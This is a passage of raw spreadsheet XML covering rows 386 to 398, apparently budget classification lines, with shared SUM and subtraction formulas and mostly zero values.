      <c r="E386" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F386" s="14">
        <f t="shared" si="151"/>
        <v>0</v>
      </c>
      <c r="G386" s="17"/>
      <c r="H386" s="17"/>
      <c r="I386" s="17"/>
      <c r="J386" s="17"/>
      <c r="K386" s="17"/>
      <c r="L386" s="17"/>
      <c r="M386" s="17"/>
      <c r="N386" s="17"/>
      <c r="O386" s="17"/>
      <c r="P386" s="17"/>
      <c r="Q386" s="17"/>
      <c r="R386" s="17"/>
      <c r="S386" s="17"/>
      <c r="T386" s="17"/>
      <c r="U386" s="17"/>
      <c r="V386" s="17"/>
      <c r="W386" s="17"/>
      <c r="X386" s="17"/>
      <c r="Y386" s="17"/>
      <c r="Z386" s="17"/>
      <c r="AA386" s="17"/>
      <c r="AB386" s="17"/>
      <c r="AC386" s="17"/>
      <c r="AD386" s="17"/>
      <c r="AE386" s="17">
        <f t="shared" ref="AE386:AP389" si="174">G386-S386</f>
        <v>0</v>
      </c>
      <c r="AF386" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AG386" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AH386" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AI386" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AJ386" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AK386" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AL386" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AM386" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AN386" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AO386" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AP386" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
    </row>
    <row r="387" ht="18" customHeight="1" spans="1:42">
      <c r="A387" s="10">
        <v>103060107</v>
      </c>
      <c r="B387" s="16" t="s">
        <v>3133</v>
      </c>
      <c r="C387" s="17">
        <v>0</v>
      </c>
      <c r="D387" s="13">
        <v>2050102</v>
      </c>
      <c r="E387" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F387" s="14">
        <f t="shared" si="151"/>
        <v>0</v>
      </c>
      <c r="G387" s="17"/>
      <c r="H387" s="17"/>
      <c r="I387" s="17"/>
      <c r="J387" s="17"/>
      <c r="K387" s="17"/>
      <c r="L387" s="17"/>
      <c r="M387" s="17"/>
      <c r="N387" s="17"/>
      <c r="O387" s="17"/>
      <c r="P387" s="17"/>
      <c r="Q387" s="17"/>
      <c r="R387" s="17"/>
      <c r="S387" s="17"/>
      <c r="T387" s="17"/>
      <c r="U387" s="17"/>
      <c r="V387" s="17"/>
      <c r="W387" s="17"/>
      <c r="X387" s="17"/>
      <c r="Y387" s="17"/>
      <c r="Z387" s="17"/>
      <c r="AA387" s="17"/>
      <c r="AB387" s="17"/>
      <c r="AC387" s="17"/>
      <c r="AD387" s="17"/>
      <c r="AE387" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AF387" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AG387" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AH387" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AI387" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AJ387" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AK387" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AL387" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AM387" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AN387" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AO387" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AP387" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
    </row>
    <row r="388" ht="18" customHeight="1" spans="1:42">
      <c r="A388" s="10">
        <v>103060108</v>
      </c>
      <c r="B388" s="16" t="s">
        <v>3134</v>
      </c>
      <c r="C388" s="17">
        <v>0</v>
      </c>
      <c r="D388" s="13">
        <v>2050103</v>
      </c>
      <c r="E388" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F388" s="14">
        <f t="shared" si="151"/>
        <v>0</v>
      </c>
      <c r="G388" s="17"/>
      <c r="H388" s="17"/>
      <c r="I388" s="17"/>
      <c r="J388" s="17"/>
      <c r="K388" s="17"/>
      <c r="L388" s="17"/>
      <c r="M388" s="17"/>
      <c r="N388" s="17"/>
      <c r="O388" s="17"/>
      <c r="P388" s="17"/>
      <c r="Q388" s="17"/>
      <c r="R388" s="17"/>
      <c r="S388" s="17"/>
      <c r="T388" s="17"/>
      <c r="U388" s="17"/>
      <c r="V388" s="17"/>
      <c r="W388" s="17"/>
      <c r="X388" s="17"/>
      <c r="Y388" s="17"/>
      <c r="Z388" s="17"/>
      <c r="AA388" s="17"/>
      <c r="AB388" s="17"/>
      <c r="AC388" s="17"/>
      <c r="AD388" s="17"/>
      <c r="AE388" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AF388" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AG388" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AH388" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AI388" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AJ388" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AK388" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AL388" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AM388" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AN388" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AO388" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AP388" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
    </row>
    <row r="389" ht="18" customHeight="1" spans="1:42">
      <c r="A389" s="10">
        <v>103060109</v>
      </c>
      <c r="B389" s="16" t="s">
        <v>3135</v>
      </c>
      <c r="C389" s="17">
        <v>0</v>
      </c>
      <c r="D389" s="13">
        <v>2050199</v>
      </c>
      <c r="E389" s="16" t="s">
        <v>3136</v>
      </c>
      <c r="F389" s="14">
        <f t="shared" si="151"/>
        <v>0</v>
      </c>
      <c r="G389" s="17"/>
      <c r="H389" s="17"/>
      <c r="I389" s="17"/>
      <c r="J389" s="17"/>
      <c r="K389" s="17"/>
      <c r="L389" s="17"/>
      <c r="M389" s="17"/>
      <c r="N389" s="17"/>
      <c r="O389" s="17"/>
      <c r="P389" s="17"/>
      <c r="Q389" s="17"/>
      <c r="R389" s="17"/>
      <c r="S389" s="17"/>
      <c r="T389" s="17"/>
      <c r="U389" s="17"/>
      <c r="V389" s="17"/>
      <c r="W389" s="17"/>
      <c r="X389" s="17"/>
      <c r="Y389" s="17"/>
      <c r="Z389" s="17"/>
      <c r="AA389" s="17"/>
      <c r="AB389" s="17"/>
      <c r="AC389" s="17"/>
      <c r="AD389" s="17"/>
      <c r="AE389" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AF389" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AG389" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AH389" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AI389" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AJ389" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AK389" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AL389" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AM389" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AN389" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AO389" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AP389" s="17">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
    </row>
    <row r="390" ht="18" customHeight="1" spans="1:42">
      <c r="A390" s="10">
        <v>103060112</v>
      </c>
      <c r="B390" s="16" t="s">
        <v>3137</v>
      </c>
      <c r="C390" s="17">
        <v>0</v>
      </c>
      <c r="D390" s="13">
        <v>20502</v>
      </c>
      <c r="E390" s="11" t="s">
        <v>3138</v>
      </c>
      <c r="F390" s="14">
        <f t="shared" ref="F390:F453" si="175">SUM(I390:R390)</f>
        <v>59</v>
      </c>
      <c r="G390" s="12">
        <f t="shared" ref="G390:R390" si="176">SUM(G391:G396)</f>
        <v>0</v>
      </c>
      <c r="H390" s="12">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="I390" s="12">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="J390" s="12">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="K390" s="12">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="L390" s="12">
        <f t="shared" si="176"/>
        <v>59</v>
      </c>
      <c r="M390" s="12">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="N390" s="12">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="O390" s="12">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="P390" s="12">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="Q390" s="12">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="R390" s="12">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="S390" s="12">
        <v>0</v>
      </c>
      <c r="T390" s="12">
        <v>0</v>
      </c>
      <c r="U390" s="12">
        <v>0</v>
      </c>
      <c r="V390" s="12">
        <v>0</v>
      </c>
      <c r="W390" s="12">
        <v>0</v>
      </c>
      <c r="X390" s="12">
        <v>59</v>
      </c>
      <c r="Y390" s="12">
        <v>0</v>
      </c>
      <c r="Z390" s="12">
        <v>0</v>
      </c>
      <c r="AA390" s="12">
        <v>0</v>
      </c>
      <c r="AB390" s="12">
        <v>0</v>
      </c>
      <c r="AC390" s="12">
        <v>0</v>
      </c>
      <c r="AD390" s="12">
        <v>0</v>
      </c>
      <c r="AE390" s="12">
        <f t="shared" ref="AE390:AP390" si="177">SUM(AE391:AE396)</f>
        <v>0</v>
      </c>
      <c r="AF390" s="12">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="AG390" s="12">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="AH390" s="12">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="AI390" s="12">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="AJ390" s="12">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="AK390" s="12">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="AL390" s="12">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="AM390" s="12">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="AN390" s="12">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="AO390" s="12">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="AP390" s="12">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
    </row>
    <row r="391" ht="18" customHeight="1" spans="1:42">
      <c r="A391" s="10">
        <v>103060113</v>
      </c>
      <c r="B391" s="16" t="s">
        <v>3139</v>
      </c>
      <c r="C391" s="17">
        <v>0</v>
      </c>
      <c r="D391" s="13">
        <v>2050201</v>
      </c>
      <c r="E391" s="16" t="s">
        <v>3140</v>
      </c>
      <c r="F391" s="14">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="G391" s="17"/>
      <c r="H391" s="17"/>
      <c r="I391" s="17"/>
      <c r="J391" s="17"/>
      <c r="K391" s="17"/>
      <c r="L391" s="17"/>
      <c r="M391" s="17"/>
      <c r="N391" s="17"/>
      <c r="O391" s="17"/>
      <c r="P391" s="17"/>
      <c r="Q391" s="17"/>
      <c r="R391" s="17"/>
      <c r="S391" s="17"/>
      <c r="T391" s="17"/>
      <c r="U391" s="17"/>
      <c r="V391" s="17"/>
      <c r="W391" s="17"/>
      <c r="X391" s="17"/>
      <c r="Y391" s="17"/>
      <c r="Z391" s="17"/>
      <c r="AA391" s="17"/>
      <c r="AB391" s="17"/>
      <c r="AC391" s="17"/>
      <c r="AD391" s="17"/>
      <c r="AE391" s="17">
        <f t="shared" ref="AE391:AP396" si="178">G391-S391</f>
        <v>0</v>
      </c>
      <c r="AF391" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AG391" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AH391" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AI391" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AJ391" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AK391" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AL391" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AM391" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AN391" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AO391" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AP391" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
    </row>
    <row r="392" ht="18" customHeight="1" spans="1:42">
      <c r="A392" s="10">
        <v>103060114</v>
      </c>
      <c r="B392" s="16" t="s">
        <v>3141</v>
      </c>
      <c r="C392" s="17">
        <v>0</v>
      </c>
      <c r="D392" s="13">
        <v>2050202</v>
      </c>
      <c r="E392" s="16" t="s">
        <v>3142</v>
      </c>
      <c r="F392" s="14">
        <f t="shared" si="175"/>
        <v>34</v>
      </c>
      <c r="G392" s="17"/>
      <c r="H392" s="17"/>
      <c r="I392" s="17"/>
      <c r="J392" s="17"/>
      <c r="K392" s="17"/>
      <c r="L392" s="17">
        <v>34</v>
      </c>
      <c r="M392" s="17"/>
      <c r="N392" s="17"/>
      <c r="O392" s="17"/>
      <c r="P392" s="17"/>
      <c r="Q392" s="17"/>
      <c r="R392" s="17"/>
      <c r="S392" s="17"/>
      <c r="T392" s="17"/>
      <c r="U392" s="17"/>
      <c r="V392" s="17"/>
      <c r="W392" s="17"/>
      <c r="X392" s="17">
        <v>34</v>
      </c>
      <c r="Y392" s="17"/>
      <c r="Z392" s="17"/>
      <c r="AA392" s="17"/>
      <c r="AB392" s="17"/>
      <c r="AC392" s="17"/>
      <c r="AD392" s="17"/>
      <c r="AE392" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AF392" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AG392" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AH392" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AI392" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AJ392" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AK392" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AL392" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AM392" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AN392" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AO392" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AP392" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
    </row>
    <row r="393" ht="18" customHeight="1" spans="1:42">
      <c r="A393" s="10">
        <v>103060115</v>
      </c>
      <c r="B393" s="16" t="s">
        <v>3143</v>
      </c>
      <c r="C393" s="17">
        <v>0</v>
      </c>
      <c r="D393" s="13">
        <v>2050203</v>
      </c>
      <c r="E393" s="16" t="s">
        <v>3144</v>
      </c>
      <c r="F393" s="14">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="G393" s="17"/>
      <c r="H393" s="17"/>
      <c r="I393" s="17"/>
      <c r="J393" s="17"/>
      <c r="K393" s="17"/>
      <c r="L393" s="17"/>
      <c r="M393" s="17"/>
      <c r="N393" s="17"/>
      <c r="O393" s="17"/>
      <c r="P393" s="17"/>
      <c r="Q393" s="17"/>
      <c r="R393" s="17"/>
      <c r="S393" s="17"/>
      <c r="T393" s="17"/>
      <c r="U393" s="17"/>
      <c r="V393" s="17"/>
      <c r="W393" s="17"/>
      <c r="X393" s="17"/>
      <c r="Y393" s="17"/>
      <c r="Z393" s="17"/>
      <c r="AA393" s="17"/>
      <c r="AB393" s="17"/>
      <c r="AC393" s="17"/>
      <c r="AD393" s="17"/>
      <c r="AE393" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AF393" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AG393" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AH393" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AI393" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AJ393" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AK393" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AL393" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AM393" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AN393" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AO393" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AP393" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
    </row>
    <row r="394" ht="18" customHeight="1" spans="1:42">
      <c r="A394" s="10">
        <v>103060116</v>
      </c>
      <c r="B394" s="16" t="s">
        <v>3145</v>
      </c>
      <c r="C394" s="17">
        <v>0</v>
      </c>
      <c r="D394" s="13">
        <v>2050204</v>
      </c>
      <c r="E394" s="16" t="s">
        <v>3146</v>
      </c>
      <c r="F394" s="14">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="G394" s="17"/>
      <c r="H394" s="17"/>
      <c r="I394" s="17"/>
      <c r="J394" s="17"/>
      <c r="K394" s="17"/>
      <c r="L394" s="17"/>
      <c r="M394" s="17"/>
      <c r="N394" s="17"/>
      <c r="O394" s="17"/>
      <c r="P394" s="17"/>
      <c r="Q394" s="17"/>
      <c r="R394" s="17"/>
      <c r="S394" s="17"/>
      <c r="T394" s="17"/>
      <c r="U394" s="17"/>
      <c r="V394" s="17"/>
      <c r="W394" s="17"/>
      <c r="X394" s="17"/>
      <c r="Y394" s="17"/>
      <c r="Z394" s="17"/>
      <c r="AA394" s="17"/>
      <c r="AB394" s="17"/>
      <c r="AC394" s="17"/>
      <c r="AD394" s="17"/>
      <c r="AE394" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AF394" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AG394" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AH394" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AI394" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AJ394" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AK394" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AL394" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AM394" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AN394" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AO394" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AP394" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
    </row>
    <row r="395" ht="18" customHeight="1" spans="1:42">
      <c r="A395" s="10">
        <v>103060117</v>
      </c>
      <c r="B395" s="16" t="s">
        <v>3147</v>
      </c>
      <c r="C395" s="17">
        <v>0</v>
      </c>
      <c r="D395" s="13">
        <v>2050205</v>
      </c>
      <c r="E395" s="16" t="s">
        <v>3148</v>
      </c>
      <c r="F395" s="14">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="G395" s="17"/>
      <c r="H395" s="17"/>
      <c r="I395" s="17"/>
      <c r="J395" s="17"/>
      <c r="K395" s="17"/>
      <c r="L395" s="17"/>
      <c r="M395" s="17"/>
      <c r="N395" s="17"/>
      <c r="O395" s="17"/>
      <c r="P395" s="17"/>
      <c r="Q395" s="17"/>
      <c r="R395" s="17"/>
      <c r="S395" s="17"/>
      <c r="T395" s="17"/>
      <c r="U395" s="17"/>
      <c r="V395" s="17"/>
      <c r="W395" s="17"/>
      <c r="X395" s="17"/>
      <c r="Y395" s="17"/>
      <c r="Z395" s="17"/>
      <c r="AA395" s="17"/>
      <c r="AB395" s="17"/>
      <c r="AC395" s="17"/>
      <c r="AD395" s="17"/>
      <c r="AE395" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AF395" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AG395" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AH395" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AI395" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AJ395" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AK395" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AL395" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AM395" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AN395" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AO395" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AP395" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
    </row>
    <row r="396" ht="18" customHeight="1" spans="1:42">
      <c r="A396" s="10">
        <v>103060118</v>
      </c>
      <c r="B396" s="16" t="s">
        <v>3149</v>
      </c>
      <c r="C396" s="17">
        <v>0</v>
      </c>
      <c r="D396" s="13">
        <v>2050299</v>
      </c>
      <c r="E396" s="16" t="s">
        <v>3150</v>
      </c>
      <c r="F396" s="14">
        <f t="shared" si="175"/>
        <v>25</v>
      </c>
      <c r="G396" s="17"/>
      <c r="H396" s="17"/>
      <c r="I396" s="17"/>
      <c r="J396" s="17"/>
      <c r="K396" s="17"/>
      <c r="L396" s="17">
        <v>25</v>
      </c>
      <c r="M396" s="17"/>
      <c r="N396" s="17"/>
      <c r="O396" s="17"/>
      <c r="P396" s="17"/>
      <c r="Q396" s="17"/>
      <c r="R396" s="17"/>
      <c r="S396" s="17"/>
      <c r="T396" s="17"/>
      <c r="U396" s="17"/>
      <c r="V396" s="17"/>
      <c r="W396" s="17"/>
      <c r="X396" s="17">
        <v>25</v>
      </c>
      <c r="Y396" s="17"/>
      <c r="Z396" s="17"/>
      <c r="AA396" s="17"/>
      <c r="AB396" s="17"/>
      <c r="AC396" s="17"/>
      <c r="AD396" s="17"/>
      <c r="AE396" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AF396" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AG396" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AH396" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AI396" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AJ396" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AK396" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AL396" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AM396" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AN396" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AO396" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="AP396" s="17">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
    </row>
    <row r="397" ht="18" customHeight="1" spans="1:42">
      <c r="A397" s="10">
        <v>103060119</v>
      </c>
      <c r="B397" s="16" t="s">
        <v>3151</v>
      </c>
      <c r="C397" s="17">
        <v>0</v>
      </c>
      <c r="D397" s="13">
        <v>20503</v>
      </c>
      <c r="E397" s="11" t="s">
        <v>3152</v>
      </c>
      <c r="F397" s="14">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="G397" s="12">
        <f t="shared" ref="G397:R397" si="179">SUM(G398:G402)</f>
        <v>0</v>
      </c>
      <c r="H397" s="12">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="I397" s="12">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="J397" s="12">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="K397" s="12">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="L397" s="12">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="M397" s="12">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="N397" s="12">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="O397" s="12">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="P397" s="12">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="Q397" s="12">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="R397" s="12">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="S397" s="12">
        <v>0</v>
      </c>
      <c r="T397" s="12">
        <v>0</v>
      </c>
      <c r="U397" s="12">
        <v>0</v>
      </c>
      <c r="V397" s="12">
        <v>0</v>
      </c>
      <c r="W397" s="12">
        <v>0</v>
      </c>
      <c r="X397" s="12">
        <v>0</v>
      </c>
      <c r="Y397" s="12">
        <v>0</v>
      </c>
      <c r="Z397" s="12">
        <v>0</v>
      </c>
      <c r="AA397" s="12">
        <v>0</v>
      </c>
      <c r="AB397" s="12">
        <v>0</v>
      </c>
      <c r="AC397" s="12">
        <v>0</v>
      </c>
      <c r="AD397" s="12">
        <v>0</v>
      </c>
      <c r="AE397" s="12">
        <f t="shared" ref="AE397:AP397" si="180">SUM(AE398:AE402)</f>
        <v>0</v>
      </c>
      <c r="AF397" s="12">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="AG397" s="12">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="AH397" s="12">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="AI397" s="12">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="AJ397" s="12">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="AK397" s="12">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="AL397" s="12">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="AM397" s="12">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="AN397" s="12">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="AO397" s="12">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="AP397" s="12">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
    </row>
    <row r="398" ht="18" customHeight="1" spans="1:42">
      <c r="A398" s="10">
        <v>103060120</v>
      </c>
      <c r="B398" s="16" t="s">
        <v>3153</v>
      </c>
      <c r="C398" s="17">
        <v>0</v>
      </c>
      <c r="D398" s="13">
        <v>2050301</v>
      </c>
      <c r="E398" s="16" t="s">
        <v>3154</v>
      </c>
      <c r="F398" s="14">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="G398" s="17"/>
      <c r="H398" s="17"/>
      <c r="I398" s="17"/>
      <c r="J398" s="17"/>
      <c r="K398" s="17"/>
      <c r="L398" s="17"/>
      <c r="M398" s="17"/>
      <c r="N398" s="17"/>
      <c r="O398" s="17"/>
      <c r="P398" s="17"/>
      <c r="Q398" s="17"/>
      <c r="R398" s="17"/>
      <c r="S398" s="17"/>
      <c r="T398" s="17"/>
      <c r="U398" s="17"/>
      <c r="V398" s="17"/>
      <c r="W398" s="17"/>
      <c r="X398" s="17"/>
      <c r="Y398" s="17"/>
      <c r="Z398" s="17"/>
      <c r="AA398" s="17"/>
      <c r="AB398" s="17"/>
      <c r="AC398" s="17"/>
      <c r="AD398" s="17"/>
      <c r="AE398" s="17">
        <f t="shared" ref="AE398:AP402" si="181">G398-S398</f>
        <v>0</v>
      </c>
      <c r="AF398" s="17">
        <f t="shared" si="181"/>
        <v>0</v>
      </c>
      <c r="AG398" s="17">
        <f t="shared" si="181"/>
        <v>0</v>
      </c>
